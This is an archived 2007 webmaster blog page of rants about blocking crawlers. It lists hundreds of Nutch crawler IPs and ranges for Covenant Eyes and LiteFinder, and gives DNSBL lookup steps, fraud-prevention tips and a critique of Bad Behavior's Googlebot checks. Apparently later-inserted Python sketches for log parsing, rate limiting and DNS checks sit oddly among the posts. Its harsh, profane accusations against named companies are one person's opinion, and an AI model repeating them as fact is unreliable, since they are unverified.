IncrediBILL's Random Rants: 2007

Monday, December 31, 2007

How Much Nutch is TOO MUCH Nutch Revisited

To date there have been 585 unique IPs hitting my server since I started tracking this nuisance called nutch.

Here's a list of IPs with nutch sightings to date:

12.47.49.97
13.1.137.86
13.1.139.202
13.1.139.205
13.1.139.206
13.1.139.211
13.1.139.212
13.1.139.213
15.203.249.124
24.12.140.54
24.222.153.250
24.231.207.219
24.247.204.244
24.5.71.1
24.6.168.184
24.94.62.119
35.10.2.90
58.186.61.164
58.187.12.236
58.187.22.230
58.215.74.242
58.215.74.253
58.215.75.2
58.68.42.138
58.87.139.90
59.160.240.115
59.160.240.116
59.160.240.183
59.160.240.184
59.160.240.185
59.176.10.136
60.248.9.114
61.135.151.175
61.246.2.241
61.8.140.20
62.129.132.47
62.168.188.151
62.192.109.66
62.192.11.2
62.40.33.173
62.40.36.87
62.54.4.138
63.133.162.98
63.246.7.209
63.82.23.2
64.105.36.210
64.106.247.178
64.18.197.136
64.209.138.200
64.229.206.25
64.229.222.170
64.229.226.126
64.229.33.51
64.231.233.162
64.236.128.27
64.241.242.18
64.242.88.10
64.242.88.60
64.34.172.78
64.34.180.167
64.38.10.26
64.47.51.158
64.71.164.125
65.120.64.146
65.220.67.9
65.92.160.39
65.95.155.163
66.132.240.180
66.132.249.23
66.135.44.34
66.135.44.35
66.135.44.36
66.135.44.37
66.135.44.38
66.135.44.39
66.135.44.40
66.135.44.41
66.135.44.42
66.135.44.43
66.135.44.44
66.135.44.46
66.135.44.48
66.135.44.49
66.135.44.50
66.135.44.51
66.135.44.52
66.135.44.53
66.15.68.234
66.207.120.226
66.24.192.59
66.24.198.171
66.24.199.39
66.24.240.206
66.243.31.34
66.30.10.222
66.92.153.138
67.110.56.45
67.110.58.2
67.111.28.139
67.184.246.61
67.202.20.30
67.202.49.49
67.202.6.11
67.52.101.242
67.68.42.2
67.70.155.226
67.71.89.27
67.95.51.86
68.178.171.109
68.178.202.79
68.205.124.164
68.205.127.94
68.228.72.198
68.97.222.117
69.248.26.83
69.36.233.8
69.55.233.28
69.60.125.233
69.90.45.7
69.93.236.178
70.143.79.234
70.187.130.253
70.197.81.79
70.21.122.162
70.48.46.56
70.50.75.8
70.56.66.216
70.62.103.114
70.85.198.178
70.87.14.34
70.90.188.18
70.96.99.254
71.216.0.210
71.217.33.149
71.241.153.125
71.35.163.79
71.98.182.170
72.0.207.162
72.2.25.66
72.2.25.67
72.2.25.71
72.21.6.146
72.21.6.147
72.21.6.148
72.232.202.50
72.232.223.234
72.232.228.58
72.233.38.194
72.233.38.195
72.233.38.196
72.233.38.197
72.36.114.145
72.36.114.147
72.36.115.42
72.36.115.45
72.36.115.47
72.36.115.52
72.36.115.53
72.36.115.54
72.36.115.56
72.36.115.57
72.36.115.59
72.36.115.64
72.36.115.65
72.36.115.68
72.36.115.69
72.36.115.70
72.36.115.72
72.36.115.73
72.36.115.74
72.36.115.77
72.36.115.79
72.36.115.80
72.36.94.100
72.36.94.106
72.36.94.107
72.36.94.109
72.36.94.110
72.36.94.112
72.36.94.113
72.36.94.118
72.36.94.119
72.36.94.121
72.36.94.122
72.36.94.123
72.36.94.124
72.36.94.169
72.36.94.173
72.36.94.176
72.36.94.179
72.36.94.181
72.36.94.182
72.36.94.20
72.36.94.201
72.36.94.203
72.36.94.243
72.36.94.38
72.36.94.39
72.36.94.48
72.36.94.50
72.36.94.52
72.36.94.54
72.36.94.56
72.36.94.60
72.36.94.61
72.36.94.68
72.36.94.90
72.36.94.92
72.36.94.96
72.36.94.99
72.36.95.12
72.36.95.131
72.36.95.134
72.36.95.145
72.36.95.146
72.36.95.147
72.36.95.148
72.36.95.149
72.36.95.150
72.36.95.152
72.36.95.154
72.36.95.155
72.36.95.156
72.36.95.157
72.36.95.158
72.36.95.160
72.36.95.161
72.36.95.162
72.36.95.165
72.36.95.166
72.36.95.167
72.36.95.168
72.36.95.170
72.36.95.173
72.36.95.176
72.36.95.177
72.36.95.178
72.36.95.179
72.36.95.183
72.36.95.185
72.36.95.207
72.36.95.209
72.36.95.212
72.36.95.214
72.36.95.217
72.36.95.218
72.36.95.226
72.36.95.227
72.36.95.230
72.36.95.231
72.36.95.232
72.36.95.236
72.36.95.237
72.36.95.238
72.36.95.239
72.36.95.251
72.44.58.104
72.44.58.167
72.44.58.173
72.44.58.244
72.44.58.252
72.44.62.107
72.44.62.122
72.44.62.124
72.44.62.151
72.44.62.162
72.44.62.166
72.44.62.197
72.44.62.199
72.44.62.208
72.44.62.245
72.5.173.12
72.5.173.22
72.51.37.148
72.84.30.230
74.111.22.20
74.111.7.226
74.208.11.120
74.39.192.237
74.52.54.130
74.69.164.2
74.98.30.178
74.98.32.176
75.126.142.100
75.126.204.194
75.44.225.44
80.38.119.131
80.79.35.55
81.173.148.94
81.173.155.210
81.203.142.109
81.67.169.232
81.93.168.211
82.150.138.138
82.150.138.139
82.16.40.198
83.149.77.7
83.246.79.28
84.101.58.177
84.101.58.70
84.191.111.92
84.231.72.32
84.231.74.47
84.57.138.191
85.117.62.114
85.145.108.135
85.17.184.39
85.17.184.41
85.177.142.252
85.179.194.32
85.179.196.134
85.18.14.22
85.214.83.174
85.52.193.36
85.88.35.34
85.88.35.35
85.88.35.37
85.88.35.41
87.139.106.60
87.233.142.106
87.242.77.169
87.69.22.130
87.98.222.116
88.191.23.109
88.198.212.50
88.74.95.48
89.149.208.224
89.31.118.248
123.113.184.253
124.157.145.165
124.32.246.36
124.32.246.45
128.174.240.249
128.174.240.251
128.174.241.130
128.174.245.163
128.208.1.160
128.208.3.173
128.208.4.10
128.208.6.125
128.208.6.200
128.208.6.207
128.208.6.226
128.208.6.227
128.208.6.232
128.208.6.75
128.208.6.77
128.238.35.93
128.95.1.189
128.97.88.68
128.97.88.70
129.242.19.138
129.34.20.19
129.78.64.106
131.112.125.102
131.112.125.103
131.112.125.104
131.112.125.106
131.112.16.220
131.211.84.21
132.178.248.36
132.178.248.47
133.30.112.143
140.247.62.79
140.247.62.80
141.30.193.12
141.30.193.5
141.30.193.6
144.92.194.22
145.99.243.67
147.202.73.2
147.202.74.2
147.202.76.2
147.202.81.2
147.202.90.2
159.226.5.82
164.67.195.201
164.67.195.245
164.67.195.26
164.67.195.27
164.67.195.67
164.67.195.68
164.67.195.86
166.214.93.76
192.17.240.18
192.17.240.19
192.17.240.20
192.17.240.21
192.17.240.22
192.17.240.25
192.17.240.26
192.17.240.27
192.17.240.28
192.17.240.29
192.17.240.30
192.17.240.32
192.17.240.33
192.17.240.34
192.17.240.36
192.17.240.41
192.17.240.42
192.17.240.43
192.17.240.44
192.17.240.45
192.17.240.46
192.17.240.47
192.17.240.48
192.17.240.50
192.17.240.52
192.17.240.53
192.17.240.54
192.17.240.55
192.17.240.56
192.17.240.57
192.17.240.58
192.17.240.59
192.17.240.60
192.17.240.62
192.17.240.65
192.17.240.71
192.17.240.73
192.17.240.74
192.17.240.76
192.17.240.79
192.17.240.81
193.138.250.141
193.138.250.237
193.145.45.68
193.203.240.117
193.203.240.118
193.203.240.119
193.203.240.120
193.203.240.121
193.203.240.122
193.203.240.135
193.205.213.166
193.252.148.51
193.42.229.3
193.42.84.5
194.153.145.119
194.153.145.15
195.250.53.25
195.72.131.70
195.72.131.71
195.72.131.72
195.72.131.73
195.72.131.74
195.72.131.75
195.72.131.76
195.72.131.77
195.72.131.78
195.72.131.79
195.72.131.80
195.72.131.81
195.72.131.82
195.72.131.85
195.72.131.86
195.72.131.87
195.72.131.88
195.72.131.89
195.72.131.90
195.72.131.91
195.72.131.92
195.72.131.93
196.203.50.219
198.87.235.130
198.87.235.142
199.4.160.10
200.152.240.214
202.10.82.98
202.174.61.198
202.20.190.235
202.20.192.195
202.69.141.20
202.98.1.120
203.113.130.205
203.147.0.44
203.199.83.162
203.244.218.1
204.123.46.105
204.123.47.91
204.228.230.38
204.228.230.43
206.222.21.2
206.222.9.122
207.115.108.202
207.176.224.241
207.176.224.244
207.176.224.245
207.214.93.42
208.109.126.135
208.64.57.65
208.96.10.200
208.96.10.201
208.96.54.71
208.96.54.72
208.96.54.73
208.96.54.76
208.96.54.77
208.96.54.79
208.96.54.80
208.96.54.81
208.96.54.82
208.96.54.83
208.96.54.84
208.96.54.85
208.96.54.86
208.96.54.88
208.96.54.89
208.96.54.90
208.96.54.91
208.96.54.95
209.139.209.220
209.139.209.224
209.51.212.10
209.51.212.18
209.51.212.26
209.85.62.159
209.85.62.162
209.85.88.150
210.174.3.130
210.196.73.193
210.245.31.15
210.245.31.18
211.152.34.34
212.101.97.63
212.12.114.238
212.137.33.140
212.156.230.210
212.166.192.129
212.174.130.121
212.174.130.122
212.58.116.72
213.132.171.245
213.132.175.101
213.157.204.141
213.219.170.12
213.251.133.12
216.163.188.200
216.163.188.201
216.182.225.186
216.182.229.37
216.182.229.39
216.182.229.91
216.182.230.40
216.182.230.54
216.182.230.75
216.182.236.46
216.182.236.77
216.182.237.45
216.182.238.83
216.231.36.92
216.24.131.152
216.58.87.217
216.93.185.12
217.10.144.242
217.106.233.192
217.153.59.26
217.31.51.128
217.80.112.146
218.25.39.81
220.130.191.231
220.130.191.232
220.130.191.233
220.130.191.234
220.130.191.235
220.130.191.236
220.130.191.237
220.130.191.238
220.130.191.239
220.130.191.240
220.226.195.162
220.226.195.163
220.226.195.165
220.226.195.166
220.226.195.167
220.226.195.168
221.114.253.210
221.116.237.114
221.221.140.114
221.221.237.35
222.173.249.33
222.210.196.26
222.46.17.43
222.46.17.47
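A list like this can be pulled straight out of a web server access log. Here's a minimal sketch. It assumes the Apache/NGINX "combined" log format, where the client IP comes first and the user agent is the last quoted field. It also assumes the crawler leaves "nutch" somewhere in its user agent. `unique_nutch_ips` is a hypothetical helper, not the tool used to build the list above.

```python
import re

# Combined log format: the client IP is the first field and the
# user agent is the last double-quoted field on the line.
LOG_LINE = re.compile(r'^(\S+) .*"([^"]*)"\s*$')


def unique_nutch_ips(lines):
    """Return the set of client IPs whose user agent mentions nutch (any case)."""
    ips = set()
    for line in lines:
        match = LOG_LINE.match(line)
        if match and "nutch" in match.group(2).lower():
            ips.add(match.group(1))
    return ips
```

Running it over the whole log and taking `len()` of the result gives a unique-IP count like the 585 quoted above.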

If I weren't blocking nutch, my server would probably be down in flames from the nutch DDoS.

Nothing dangerous about giving away code, not a thing.

Saturday, December 22, 2007

Covenant Eyes Needs Accountability

Here's yet another company making money from hitting your server without permission.

This one is an online service called Covenant Eyes, a Net Nanny type of service that's been hitting one of my sites for ages. Over time they have requested thousands of pages and never gotten anything but an error message, yet they keep trying, always with a blank user agent.

They operate from this range of IPs:

Covenant Eyes, Inc MOG-69-41-14-0 (NET-69-41-14-0-1)
69.41.14.0 - 69.41.14.127

Yesterday they suddenly started using this user agent after years of leaving it blank:

69.41.14.83 "libcurl-agent/1.0"

The website claims:

Covenant Eyes Software provides Internet Integrity with accountability reports.

I guess it depends on who defines "Internet Integrity" or "accountability" because I personally don't find much integrity or accountability in hiding why you're hitting my website behind blank user agents or some default user agent.

The site also claims:

A church in town lost it's pastor to porn...

Which brings up the point that any rogue webmaster could cloak very bad content to Covenant Eyes and think it's funny to get someone in trouble whose "accountability report" goes to a boss, spouse or parent. I hope someone checks that these reports are accurate before punishing anyone.

IMO blocking 69.41.14.0 - 69.41.14.127 (or simply 69.41.14.*) should stop their members from being "tempted" to visit your sites.
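Note that 69.41.14.0 - 69.41.14.127 is exactly a /25, so 69.41.14.* (the whole /24) is twice as broad as the registered range. Here's a minimal sketch of the narrower check using Python's standard `ipaddress` module. `is_covenant_eyes` is a hypothetical name.

```python
import ipaddress

# The registered range 69.41.14.0 - 69.41.14.127 collapses to one /25 network.
COVENANT_EYES = ipaddress.ip_network("69.41.14.0/25")


def is_covenant_eyes(ip: str) -> bool:
    """True if the client IP falls inside the Covenant Eyes range."""
    return ipaddress.ip_address(ip) in COVENANT_EYES
```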

Wednesday, December 19, 2007

Snared Human Claims "I Ain't No Bot!"

When you snare a human in your bot trap, they might get a little feisty and squirm a bit. Those snared humans may even send you a scathing email claiming complete innocence and insisting your tools are broken: bad bot blocker, BAD!

Amazing that his tool appears to be the one broken, not mine!

I nicely replied to this snared human and asked if he could explain why he downloaded a couple of hundred pages in just a few minutes, many of them the same page over and over and over again, sometimes several per second.

Sorry, Mr. Human, but your browser behaves exactly like the high-speed scrapers that have attacked me in the past, so you were shut down for behaving badly.

I suspect he has PRE-FETCH enabled, which is amusing because I have PRE-FETCH disabled server-side. If it was enabled, it didn't identify itself as PRE-FETCH, and that's why he was snared.

Oh boo hoo, guess you'll just have to go waste someone else's bandwidth using that stupid browser that keeps downloading the same pages as fast as it can download them.

I won't miss you and don't let the door hit you on the way out.
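The behavior that snared him was a couple of hundred pages in a few minutes, sometimes several per second. A per-IP sliding window catches that kind of thing. This is a minimal sketch, not the actual bot blocker behind this blog. The thresholds are made-up examples, and `headers` is assumed to be a plain dict keyed exactly as shown. The prefetch test assumes the `X-moz: prefetch` header that Firefox sends with link prefetches.

```python
from collections import defaultdict, deque

MAX_REQUESTS = 30      # hypothetical: most requests allowed per window
WINDOW_SECONDS = 60.0  # hypothetical: window length in seconds


class SpeedTrap:
    """Per-IP sliding-window counter that flags clients fetching too fast."""

    def __init__(self, max_requests=MAX_REQUESTS, window=WINDOW_SECONDS):
        self.max_requests = max_requests
        self.window = window
        self.hits = defaultdict(deque)  # ip -> timestamps of recent requests

    def check(self, ip, now, headers):
        """Return "refuse-prefetch", "trap" or "ok" for one request at time `now`."""
        # Firefox marks link prefetches with "X-moz: prefetch". Prefetch is
        # refused server-side, so decline these without counting them.
        if headers.get("X-moz", "").lower() == "prefetch":
            return "refuse-prefetch"
        recent = self.hits[ip]
        recent.append(now)
        # Drop timestamps that have slid out of the window.
        while now - recent[0] > self.window:
            recent.popleft()
        return "trap" if len(recent) > self.max_requests else "ok"
```

A prefetch that announces itself is refused without counting against the client. One that doesn't announce itself just looks like more fast requests and eventually trips the trap.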

Monday, December 17, 2007

Yahoo! Ignorance Shines in ShoeMoney Reputation Attack

Q: What do you do when your payment processing anti-fraud detection doesn't work?

A: It appears you fire your referring affiliate if your name is Yahoo!

That's right, boys and girls: according to ShoeMoney, the nitwits at Yahoo! obviously can't detect fraudulent transactions, so they blame someone who's under fire from a blatant reputation attack.

Now, Yahoo! Stores and other properties do a lot of payment processing, so they should have a ton of historical data, potentially including legitimate past uses of the stolen credit cards themselves. Wouldn't you think that with all this information they could flag a few fraudulent sales?

Apparently not.

OK, even without any historical data on the customer, there are a few easy ways to combat what appears, based on the volume of transactions, to be automated fraud. None of them involve firing one of your affiliates.

1. Validate the account with email confirmation BEFORE processing the credit card, using a 2-step process known as AUTH and BOOK (often called authorize and capture). You pre-authorize the sale first, setting aside the money until you're sure the sale is valid, and then BOOK the sale after the fact.

2. Require that the account creation and/or checkout page use several forms of automation blocking, such as JavaScript and/or some form of CAPTCHA.

3. Obviously use full AVS (Address Verification Service) and require the CSC / CVV2 (Credit Card Security Code) to make sure everything checks out with the credit card company.

4. Use GeoIP services to check that the IP address placing the order is even close to the actual address on the order and if not, flag it for human review before processing.

5. Do some basic IP blocking and restrict access to those account creation pages from hosting data centers, lists of known proxy servers, botnets and spammers.

There are a couple of other steps I'd take as well, but I'd be shocked if someone got past the 5 steps above without tripping at least one alarm for human review. Even if a human were performing the attack manually, the GeoIP check should flag a problem unless Yahoo! just ignores it.
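The "any alarm means human review" logic from the five steps above fits in a few lines. This sketch assumes the AVS/CVV2 results come back from the payment processor. It also assumes the latitude/longitude pairs come from a GeoIP lookup and an address geocoder. The `Order` fields and the 500 km tolerance are hypothetical choices. The GeoIP step uses the standard haversine great-circle distance.

```python
import math
from dataclasses import dataclass
from typing import List, Tuple

EARTH_RADIUS_KM = 6371.0
MAX_GEOIP_DISTANCE_KM = 500.0  # hypothetical tolerance, tune to taste


@dataclass
class Order:
    # Hypothetical fields: in practice these come from the signup flow,
    # the processor's AVS/CVV2 response and a GeoIP lookup.
    email_confirmed: bool
    passed_captcha: bool
    avs_match: bool
    cvv2_match: bool
    ip_latlon: Tuple[float, float]
    billing_latlon: Tuple[float, float]
    ip_is_datacenter_or_proxy: bool


def haversine_km(a, b):
    """Great-circle distance in km between two (lat, lon) points given in degrees."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    h = (math.sin((lat2 - lat1) / 2) ** 2
         + math.cos(lat1) * math.cos(lat2) * math.sin((lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_KM * math.asin(math.sqrt(h))


def review_alarms(order: Order) -> List[str]:
    """List every failed check; any alarm means hold the AUTH for human review before BOOK."""
    alarms = []
    if not order.email_confirmed:
        alarms.append("email not confirmed")
    if not order.passed_captcha:
        alarms.append("automation check failed")
    if not (order.avs_match and order.cvv2_match):
        alarms.append("AVS/CVV2 mismatch")
    if haversine_km(order.ip_latlon, order.billing_latlon) > MAX_GEOIP_DISTANCE_KM:
        alarms.append("GeoIP far from billing address")
    if order.ip_is_datacenter_or_proxy:
        alarms.append("data center / proxy IP")
    return alarms
```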

The only thing that cracks me up is that ShoeMoney wanted to know what the referring URLs were. That's meaningless, because the referrer can easily be spoofed or blocked, so it's a useless piece of information.

Consider that whoever did this only needed to visit your site once to get your affiliate code. From then on they could use automation to abuse it over and over without ever visiting your site again, with the referrer claiming every time that they came from your site.

Cute huh?

Better yet, they didn't have to visit your site EVER. You allow your pages to be cached by the search engines, so anyone could get your affiliate code straight from the cached copy without leaving a trail on your website.

I've been preaching about using the "NOARCHIVE" meta tag for years now, and this is just another reason to use it, but nobody listens, and I digress...

Just to prove that Michelle from Yahoo! was completely clueless about how internet fraud works, she asked ShoeMoney to do the following:

I wanted to give you a heads up in advance to see if there was anyway you could filter or prevent fraudulent users from coming through your website/links. If so, we’d like to continue our partnership.

The odds are very high that this activity isn't passing through ShoeMoney's site whatsoever, even if it's being done manually, because the fraudsters wouldn't want to leave such an obvious trail.

Sorry to see you get the boot, Shoe (punny). It would appear that Yahoo! doesn't mind making a public spectacle of its shortcomings, and now it's open season on YSM now that they've admitted they can't spot a fraudulent transaction.

It should be loads of fun to see what happens next.

Monday, December 10, 2007

Block List Babelfish Desperately Needed

I've spent a few days trying to come up with a more comprehensive method of identifying known bad IPs using the existing block lists, and it has become quite maddening.

SpamHaus has its own collection criteria, which produce one set of BL results. ProjectHoneyPot has its own methods, which produce different results again, and so on and so forth. Then there are my own methods, which trap IPs that may intersect those BLs. Quite often, though, they cough up brand new spammer and scraper IPs that don't show up in the other BLs. Collectively all of these BLs, including my own, are quite comprehensive, but unfortunately there's no easy way to combine them in real time that makes sense.

Sadly, the current state of affairs is that there are simply too many independent services. That makes the process overwhelming for the average webmaster, who probably just picks one out of frustration and lets things slip through the cracks. Picking block list A over block list B might be the difference between your server getting hacked or not, just because one list knew about the malicious botnet IP and the other didn't.

Funny, if this were anti-virus software people wouldn't just pick any old thing, they would want comprehensive coverage, so why can't we get comprehensive coverage in block lists?

What is desperately needed is some mechanism to pool all the results together into one common service, a Block List Babelfish, where a single access can get the combined collective intelligence on whether the IP is good or bad so that everyone can easily benefit.

If anyone knows of a good BL aggregator let me know, OK?
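The pooling part of a Block List Babelfish is the easy bit; keeping the underlying lists fed is the hard part. Here's a minimal sketch of the aggregation logic. It assumes each block list is wrapped in a callable that answers "is this IP listed?". For a DNSBL that would be a DNS query; for other services it might be an HTTP API. `babelfish` and the list names used in the usage are hypothetical.

```python
from typing import Callable, Dict


def babelfish(ip: str, lists: Dict[str, Callable[[str], bool]], min_votes: int = 1) -> dict:
    """Ask every block list about one IP and pool the answers into one verdict."""
    flagged_by, unavailable = [], []
    for name, is_listed in lists.items():
        try:
            if is_listed(ip):
                flagged_by.append(name)
        except OSError:
            # A list that times out or fails to resolve shouldn't sink the whole query.
            unavailable.append(name)
    return {
        "ip": ip,
        "bad": len(flagged_by) >= min_votes,
        "flagged_by": flagged_by,
        "unavailable": unavailable,
    }
```

`min_votes=1` mirrors the anti-virus attitude above: one list knowing about a botnet IP is enough to block it. Raising it trades coverage for fewer false positives.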

Saturday, December 08, 2007

Validate Link Integrity Using DNSBLs like SpamHaus ZEN

People tend to think that lists from sites like SpamHaus are only good for keeping spam out of your servers, but that's just the tip of the iceberg if you're open to some creative thinking.

Since Google penalizes sites that link out to bad neighborhoods, one potential use for SpamHaus ZEN is to help automatically identify bad sites and remove links to them. If you run a directory or have massive numbers of outbound links, you can use zen.spamhaus.org to protect your visitors, as well as your reputation in Google and elsewhere. It lets you eliminate links to IPs associated with spammers, 3rd party exploits, proxies, worms and trojans!

How's that for a kick ass way to clean up your site?

Keep in mind that on a shared server a single IP address may represent multiple domains. Any domain on that server that is spamming or otherwise compromised will impact every domain associated with that IP. Many people may be affected without knowing there's a problem. However, since that server can be a hazard to the population at large, it's best to err on the side of caution. Suspend your association with all sites on that server until the problem is resolved.

Since most sites don't even know they've been infected, I merely quarantine those links until they are no longer reported as hostile. I re-enable them once they have been confirmed clean.
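The quarantine-and-restore cycle is simple to automate. This sketch assumes a hypothetical `is_hostile(host)` callable, for example one that resolves a link's host and checks the resulting IP against zen.spamhaus.org. Each run splits the outbound links into live and quarantined sets. It also reports which previously quarantined links came back clean.

```python
from typing import Callable, Set, Tuple
from urllib.parse import urlparse


def recheck_links(
    links: Set[str],
    quarantined: Set[str],
    is_hostile: Callable[[str], bool],
) -> Tuple[Set[str], Set[str], Set[str]]:
    """Return (active, held, restored) sets of outbound URLs for this run."""
    active, held = set(), set()
    for url in links:
        host = urlparse(url).hostname
        if host and is_hostile(host):
            held.add(url)    # hide the link but keep it on file for the next run
        else:
            active.add(url)  # clean, or cleaned up since last time: link goes live
    restored = quarantined & active
    return active, held, restored
```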

Not everything will be listed in SpamHaus ZEN, as much of the malicious activity I see isn't in their index, but it's a good reference for known bad sites.

Here's an example of how to check an IP address in SpamHaus, using a spammer's IP currently in the DNSBL.

Take the IP address 64.151.120.13 and reverse its octets to get 13.120.151.64. Then append zen.spamhaus.org, like this: 13.120.151.64.zen.spamhaus.org.

Using any DNS checking tool, query the DNSBL for the existence of 13.120.151.64.zen.spamhaus.org.

If the IP is currently in the DNSBL, you'll get a result like this:

host 13.120.151.64.zen.spamhaus.org
13.120.151.64.zen.spamhaus.org has address 127.0.0.2

If the IP address is not in the DNSBL you'll get a response like this:

host 13.120.151.123.zen.spamhaus.org
Host 13.120.151.123.zen.spamhaus.org not found: 3(NXDOMAIN)
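Here's the same lookup from code, as a sketch using only Python's standard `socket` module. It reverses the octets, appends the zone, and treats a resolution failure as "not listed". It uses `gethostbyname_ex` so that all answers come back if an IP sits on more than one list. The function names are hypothetical, and only IPv4 is handled.

```python
import socket


def dnsbl_query_name(ip: str, zone: str = "zen.spamhaus.org") -> str:
    """Reverse the IPv4 octets and append the DNSBL zone."""
    return ".".join(reversed(ip.split("."))) + "." + zone


def dnsbl_lookup(ip: str, zone: str = "zen.spamhaus.org") -> list:
    """Return the 127.0.0.x answers for a listed IP, or [] when the name doesn't resolve."""
    try:
        return socket.gethostbyname_ex(dnsbl_query_name(ip, zone))[2]
    except OSError:
        # NXDOMAIN means "not listed"; note this also swallows other lookup failures.
        return []
```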

The result codes from SpamHaus are as follows:

127.0.0.2 - SpamHaus Block List (SBL)
127.0.0.4-8 - Exploits Block List (XBL)
127.0.0.10-11 - Policy Block List (PBL)

The last list, the PBL, is something I probably wouldn't auto-block on, whether in a link checker or for any other use except anti-spam, without first reviewing what it was blocking. Those results, if they ever come up, are only flagged as "warnings" in my current implementation.
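Here's a sketch of turning those answers into actions, with PBL hits downgraded to warnings as described. The code ranges mirror the result codes listed above. Anything outside them is treated as unknown and also just warned about. That is an assumption of this sketch, not SpamHaus guidance.

```python
def classify(answer: str) -> tuple:
    """Map one ZEN answer (e.g. "127.0.0.2") to (list name, action)."""
    if not answer.startswith("127.0.0."):
        return "unknown", "warn"
    code = int(answer.rsplit(".", 1)[1])
    if code == 2:
        return "SBL", "block"
    if 4 <= code <= 8:
        return "XBL", "block"
    if code in (10, 11):
        return "PBL", "warn"  # review before blocking on PBL alone
    return "unknown", "warn"


def verdict(answers: list) -> str:
    """Collapse all answers for one IP: any block wins, then warn, else ok."""
    actions = {classify(a)[1] for a in answers}
    if "block" in actions:
        return "block"
    return "warn" if actions else "ok"
```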

Thursday, December 06, 2007

Bad Behavior Needs Behavior Modification

WebGeek recently reported on Bad Behavior Behaving Badly where he got locked out of all his own blogs and was listed as an enemy of the state and put on the FBI's 10 most wanted geek list and all sorts of things.

OK, I'm exaggerating but read his post and it's close enough.

Anyway, he mentioned one concern in particular:

"If left unattended in this state for a long time, a site could lose valuable search engine rankings, after the spiders of the Big 3 (Google, Yahoo, and MSN) find that they are locked out repeatedly with 403 errors."

Since he mentioned it: I've looked over the Bad Behavior source code before, and the way it validates robots isn't something I'd put on my website. It relies solely on IP ranges, and based on raw information I've collected from the crawlers themselves, those ranges are incomplete.

The search engines have clearly stated that they may expand into new IP ranges at any time without notice. The only official way to validate their main crawlers, Googlebot for instance, is full round-trip DNS checking. IP ranges serve as a backup just in case they make a mistake.

So this code could easily be obsolete at any time:

if (stripos($ua, "Googlebot") !== FALSE || stripos($ua, "Mediapartners-Google") !== FALSE) {
    require_once(BB2_CORE . "/google.inc.php");
}

// Analyze user agents claiming to be Googlebot
function bb2_google($package)
{
    if (match_cidr($package['ip'], "66.249.64.0/19") === FALSE && match_cidr($package['ip'], "64.233.160.0/19") === FALSE) {
        return "f1182195";
    }
    return false;
}

Even more importantly, I've tracked Google crawlers in the following IP ranges, 2 more ranges than Bad Behavior has in its code!

64.233.160.0 - 64.233.191.255
66.249.64.0 - 66.249.95.255
72.14.192.0 - 72.14.239.255
216.239.32.0 - 216.239.63.255
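Here's a minimal sketch of the round-trip check with the observed ranges as the fallback, using only Python's standard library. It assumes genuine Googlebot hosts reverse-resolve under googlebot.com or google.com. The range list is simply the four ranges above. Since 72.14.192.0 - 72.14.239.255 doesn't fit a single CIDR block, `summarize_address_range` splits it into a /19 and a /20. The function names are hypothetical.

```python
import ipaddress
import socket

# The four ranges observed above, as (first, last) address pairs.
OBSERVED_RANGES = [
    ("64.233.160.0", "64.233.191.255"),
    ("66.249.64.0", "66.249.95.255"),
    ("72.14.192.0", "72.14.239.255"),
    ("216.239.32.0", "216.239.63.255"),
]
GOOGLE_NETS = [
    net
    for first, last in OBSERVED_RANGES
    for net in ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))
]


def in_observed_ranges(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in GOOGLE_NETS)


def round_trip_dns_ok(ip: str, suffixes=(".googlebot.com", ".google.com")) -> bool:
    """Reverse-resolve the IP, check the domain, then forward-resolve it back to the IP."""
    try:
        host = socket.gethostbyaddr(ip)[0]
        if not host.endswith(suffixes):
            return False
        return ip in socket.gethostbyname_ex(host)[2]
    except OSError:
        return False


def is_real_googlebot(ip: str) -> bool:
    # Round-trip DNS is the primary test; the observed ranges are only the backup.
    return round_trip_dns_ok(ip) or in_observed_ranges(ip)
```

Checking DNS first means a crawler showing up from a brand new range still passes. The range list only matters when Google's own DNS is misconfigured.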

The same criticism applies to validating the other bots. Bad Behavior needs a little more robustness in its validation code so that it isn't accidentally blocking valid robots from indexing web pages. Unless I'm missing something, I don't even see where Yahoo crawlers are specifically validated (I'm tracking 11 IP ranges for Yahoo). The MSNBOT check was also missing the 131.107.0.0/16 CIDR range, etc.

As it stands, the code doesn't have all the IP ranges that I've seen used for any of the major search engines so there is some risk, albeit not a big risk, that some legitimate search engine traffic is being bounced.

Not only that, but the MSIE validation is full of holes and most of the stealth crawlers I block will zip right through Bad Behavior and scrape the blog.

I think WebGeek is right: I would disable the add-in until those issues are resolved.

LiteFinder REALLY Go Fuck Yourself Now

In my opinion this whole LiteFinder Network Crawler is completely bogus.

Yesterday I commented on their crawler, which now appears to be just a ruse to lure people to their web site, which is nothing but a big front for affiliate links.

Go to the LiteFinder home page and take a look at the main topics: Adult: Penis Enlargement, Online Gambling or the popular searches for "Phentermine" or "Breast Enlargement Pill".

Riiiiight.

This site is so spammy it would make Sanford Wallace blush.

The so-called search feature doesn't search shit, it just spits up a bunch of bullshit links.

Here are the results for a query on PLUMBING:

Shop
Browse and compare a great selection of .
www.somesite.com

Save up to 95% - diamond jewelry, engagement rings, designer watches, and much more. Live auctions starting at one dollar
somedomain.com

Gold, and Silver Jewelry
Great selection of jewelry including Rings, Necklaces, Bracelets, Pendants, Earrings, Body Jewelry, and Spazio watches.
somejewelry.com

Bored? Check Out the Sumo!
Viral video mayhem. Games Galore. Sucker free music. Bangin' Hotties. Animation for your fascination. Go to the Sumo, live large and never be disappointed by a weak video website again.
www.somesite.com

Etc. you get the idea...

What purpose is a crawler that doesn't feed a search engine?

You've got it, it's a lure, we've been had.

This LiteFinder Network Crawler thing just needs to be blocked, that's all there is to it.

Wednesday, December 05, 2007

LiteFinder Network Crawler Go Fuck Yourself

I don't get too riled up until I read some self-serving pompous bullshit like this that just makes the hair stand up on the back of my neck:

Can I learn the IP addresses, which LiteFinder Network Crawler comes from?
Unfortunately, You can't since it is against the rules of our company.

The user agent for this mess is:

"Mozilla/5.0 (compatible; LiteFinder/1.0; +http://www.litefinder.net/about.html)"

Since they don't feel like sharing the IP addresses, let me do the honors since it's not against MY company policy:

208.101.44.3 -> mybluewine.net.
209.160.65.42 -> hopone.net.
209.62.109.178 -> ev1s-209-62-109-178.ev1servers.net.
216.40.220.34 -> ev1s-216-40-220-34.ev1servers.net.
216.40.222.50 -> ev1s-216-40-222-50.ev1servers.net.
216.40.222.66 -> ev1s-216-40-222-66.ev1servers.net.
216.40.222.82 -> ev1s-216-40-222-82.ev1servers.net.
